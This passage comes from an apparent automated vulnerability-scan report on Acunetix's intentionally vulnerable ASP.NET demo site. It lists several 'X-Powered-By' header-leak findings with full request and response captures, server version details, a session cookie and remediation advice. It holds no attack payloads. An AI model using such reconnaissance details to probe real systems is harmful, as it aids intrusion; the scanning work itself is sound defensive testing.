          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        20. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 17888
          
          
          Response body (17888 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        21. GET http://testaspnet.vulnweb.com/robots.txt
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (222 bytes)
          GET http://testaspnet.vulnweb.com/robots.txt HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (245 bytes)
          HTTP/1.1 200 OK
          Content-Type: text/plain
          Last-Modified: Mon, 06 May 2019 12:46:42 GMT
          Accept-Ranges: bytes
          ETag: "b0b05ac194d51:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13
          
          
          Response body (13 bytes)
          User-agent: *
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        22. GET http://testaspnet.vulnweb.com/rssFeed.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/rssFeed.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (220 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/xml; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 2118
          
          
          Response body (2118 bytes)
          
          <rss version="2.0">
                <channel>
                  <title>Acunetix testaspnet</title>
                  <link>http://testaspnet.acunetix.com/</link>
                  <description>
                    This is the syndication feed for testaspnet.acunetix.com.
                  </description>
          
                  <item>
                    <title>Acunetix Vulnerability Scanner Now With Network Security Scans</title>
                    <description>
                       Seamless OpenVAS integration now also available on Windows and Linux
                    </description>
                    <link>
                       http://testaspnet.acunetix.com/ReadNews.aspx?id=0
                    </link>
                    <author>admin                    </author>
                    <pubDate>
                       Thu, 16 May 2019 12:32:30 GMT
                     </pubDate>
                  </item>
            
                  <item>
                    <title>Acunetix Web Vulnerability Scanner beta released!</title>
                    <description>
                       26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.
                    </description>
                    <link>
                       http://testaspnet.acunetix.com/ReadNews.aspx?id=3
                    </link>
                    <author>admin                    </author>
                    <pubDate>
                       Tue, 08 Nov 2005 11:37:35 GMT
                     </pubDate>
                  </item>
            
                  <item>
                    <title>Web attacks - can your web applications withstand the force?</title>
                    <description>
                       21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.
                    </description>
                    <link>
                       http://testaspnet.acunetix.com/ReadNews.aspx?id=2
                    </link>
                    <author>admin                    </author>
                    <pubDate>
                       Tue, 08 Nov 2005 11:35:22 GMT
                     </pubDate>
                  </item>
            
                </channel>
              </rss>  
            
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        23. GET http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (315 bytes)
          GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 12954
          
          
          Response body (12954 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						
          					</TD>
          
          					<TD vAlign="top" width="200">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        24. GET http://testaspnet.vulnweb.com/sitemap.xml
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (275 bytes)
          GET http://testaspnet.vulnweb.com/sitemap.xml HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (160 bytes)
          HTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 1245
          
          
          Response body (1245 bytes)
          <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
          <html xmlns="http://www.w3.org/1999/xhtml">
          <head>
          <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
          <title>404 - File or directory not found.</title>
          <style type="text/css">
          <!--
          body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
          fieldset{padding:0 15px 10px 15px;} 
          h1{font-size:2.4em;margin:0;color:#FFF;}
          h2{font-size:1.7em;margin:0;color:#CC0000;} 
          h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
          #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
          background-color:#555555;}
          #content{margin:0 0 0 2%;position:relative;}
          .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
          -->
          </style>
          </head>
          <body>
          <div id="header"><h1>Server Error</h1></div>
          <div id="content">
           <div class="content-container"><fieldset>
            <h2>404 - File or directory not found.</h2>
            <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
           </fieldset></div>
          </div>
          </body>
          </html>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        25. GET http://testaspnet.vulnweb.com/styles.css
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/styles.css HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: text/css
          Last-Modified: Thu, 29 May 2008 14:36:50 GMT
          Accept-Ranges: bytes
          ETag: "c8c2136e99c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 2597
          
          
          Response body (2597 bytes)
          body
          {
          	padding-right: 0px;
          	padding-left: 0px;
          	list-style-position: outside;
          	background: url(images/background.gif) #e6dccf fixed repeat-y center top;
          	padding-bottom: 0px;
          	margin: 0px;
          	font: small tahoma, "Bitstream Vera Sans" , "Trebuchet MS" , "Lucida Grande" , lucida, helvetica, sans-serif;
          	padding-top: 0px;
          	list-style-type: square;
          }
          A.menu
          {
          	padding-right: 10px;
          	padding-left: 10px;
          	color: #806640;
          	text-decoration: none;
          	background-color: #e6dccf;
          }
          A.menu:hover
          {
          	padding-right: 10px;
          	padding-left: 10px;
          	color: #e6dccf;
          	text-decoration: none;
          	background-color: #BF8630;
          }
          A.NewsOperation
          {
          	font-size: xx-small;
          	margin-left: 5px;
          	color: #BF8630;
          	margin-right: 5px;
          	text-decoration: none;
          }
          A.NewsOperation:hover
          {
          	font-size: xx-small;
          	margin-left: 5px;
          	color: #E6B873;
          	margin-right: 5px;
          	text-decoration: none;
          }
          .Framed
          {
          	border: #E6DCCF 1px solid;
          }
          .FramedForm
          {
          	border-right: #806640 1px solid;
          	border-top: #806640 1px solid;
          	border-left: #806640 1px solid;
          	border-bottom: #806640 1px solid;
          	background-color: #e6dccf;
          }
          .MenuBar
          {
          	border-top: #806640 1px solid;
          	border-bottom: #806640 1px solid;
          	background-color: #e6dccf;
          }
          .Calendar
          {
          	border-right: #e6b873 1px solid;
          	border-top: #e6b873 1px solid;
          	border-left: #e6b873 1px solid;
          	border-bottom: #e6b873 1px solid;
          }
          INPUT
          {
          	border: #806640 1px solid;
          }
          INPUT.classic
          {
          	border: none;
          }
          TEXTAREA
          {
          	border: #807940 1px solid;
          }
          INPUT.PostNews
          {
          	border: #807940 1px solid;
          	width: 500px;
          }
          INPUT.Login
          {
          	border: #807940 1px solid;
          	width: 250px;
          }
          TEXTAREA.PostNews
          {
          	border: #807940 1px solid;
          	width: 500px;
          	height: 300px;
          }
          TEXTAREA.CommentTA
          {
          	border: #807940 1px solid;
          	width: 450px;
          	height: 100px;
          }
          .NewsDate
          {
          	border-top: #e6b873 2px solid;
          	font-size: xx-small;
          	border-bottom: #e6b873 1px solid;
          }
          
          .NewsTitle
          {
          	font-weight: bolder;
          	margin-bottom: 5px;
          	text-transform: capitalize;
          	padding-top: 2px;
          }
          .NewsShort
          {
          	padding-left: 5px;
          	margin-bottom: 10px;
          }
          .NewsLong
          {
          	padding-left: 5px;
          	margin-bottom: 10px;
          	border-bottom: #e6b873 1px solid;
          }
          .CommentText
          {
          	margin-top: 10px;
          	margin-bottom: 5px;
          }
          .CommentAuthor
          {
          	font-size: xx-small;
          	margin-bottom: 10px;
          }
          .Comment
          {
          	clear: both;
          	border-right: #806640 1px solid;
          	padding-right: 5px;
          	padding-left: 5px;
          	float: none;
          	padding-bottom: 5px;
          	border-left: #806640 1px solid;
          	width: 500px;
          	padding-top: 5px;
          }
          .Calendar
          {
          	border: solid 1px #E6B873;
          }
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        26. POST http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/about.aspx
          Content-Length: 1027
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1027 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
